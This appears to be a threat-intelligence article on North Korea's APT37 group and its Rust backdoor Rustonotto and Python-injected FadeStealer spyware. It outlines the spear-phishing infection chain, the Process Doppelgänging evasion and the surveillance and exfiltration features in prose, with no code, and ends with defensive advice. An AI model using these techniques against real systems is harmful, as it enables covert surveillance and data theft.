The North Korean state-sponsored cyber espionage group, APT37—also known as ScarCruft, Ruby Sleet, and Velvet Chollima—has recently expanded its arsenal by incorporating sophisticated malware developed in Rust and Python. This evolution signifies the group’s commitment to enhancing its technical capabilities and evasion techniques.
Background on APT37
Active since 2012, APT37 primarily targets individuals and organizations in South Korea, focusing on those connected to the North Korean regime or involved in human rights activism. The group’s operations have historically included exploiting vulnerabilities in widely used software and employing social engineering tactics to achieve their objectives.
Introduction of Rustonotto Backdoor
In their latest campaign, APT37 has introduced a Rust-based backdoor named Rustonotto. The adoption of Rust—a language known for its performance and safety features—indicates a strategic shift towards developing more robust and cross-platform compatible malware. Rustonotto functions as a lightweight command executor, capable of receiving Base64-encoded Windows commands and transmitting execution results back to the attackers’ command-and-control (C2) infrastructure.
Enhanced Python-Based Injection Techniques
Alongside Rustonotto, APT37 has refined its Python-based injection methods to deploy their surveillance tool, FadeStealer. This approach involves sophisticated techniques such as Process Doppelgänging and the use of Transactional NTFS (TxF) for stealthy code injection, demonstrating the group’s advanced evasion capabilities.
Attack Methodology
The attack chain typically commences with spear-phishing emails containing malicious Windows shortcut (.lnk) files or Compiled HTML Help (CHM) files. Upon execution, these files initiate a multi-stage infection process:
1. Initial Compromise: The malicious .lnk or CHM files execute embedded PowerShell scripts, establishing persistence mechanisms within the system registry.
2. Deployment of Rustonotto: The PowerShell scripts download and execute the Rustonotto backdoor, enabling the attackers to issue commands and control the compromised system remotely.
3. Advanced Payload Delivery: The attackers utilize Microsoft Cabinet (.cab) files to deliver additional payloads, including the Python-based injection scripts and the encrypted FadeStealer malware.
4. Execution of FadeStealer: The Python injection script decrypts and injects FadeStealer into legitimate Windows processes using Process Doppelgänging, allowing the malware to operate stealthily.
Capabilities of FadeStealer
Once deployed, FadeStealer functions as a comprehensive surveillance tool with the following capabilities:
– Keylogging: Records all keystrokes in real-time, capturing sensitive information such as passwords and confidential communications.
– Screenshot Capture: Takes screenshots every 30 seconds, providing visual insights into the victim’s activities.
– Audio Recording: Records 5-minute audio sessions, potentially capturing private conversations.
– USB Device Monitoring: Monitors connected USB devices hourly, enabling the exfiltration of data from removable storage.
The collected data is compressed into timestamped archives with hardcoded password protection and exfiltrated through HTTP POST requests, ensuring secure transmission to the attackers’ servers.
Implications and Recommendations
APT37’s adoption of Rust and Python for malware development reflects a significant advancement in their technical sophistication. The use of modern programming languages and advanced injection techniques enhances the malware’s stealth and effectiveness, posing increased challenges for detection and mitigation.
To defend against such threats, organizations should implement the following measures:
– User Education: Conduct regular training sessions to raise awareness about spear-phishing tactics and the risks associated with opening unsolicited attachments.
– Email Filtering: Deploy advanced email filtering solutions to detect and block malicious attachments and links.
– Endpoint Detection and Response (EDR): Utilize EDR solutions capable of identifying and responding to suspicious activities, including unusual process injections and fileless malware techniques.
– Regular Software Updates: Ensure that all software, especially operating systems and commonly used applications, are updated promptly to patch known vulnerabilities.
– Network Monitoring: Implement robust network monitoring to detect anomalous data exfiltration patterns and unauthorized communications with external servers.
By adopting a multi-layered security approach and staying informed about evolving threat landscapes, organizations can enhance their resilience against sophisticated adversaries like APT37.
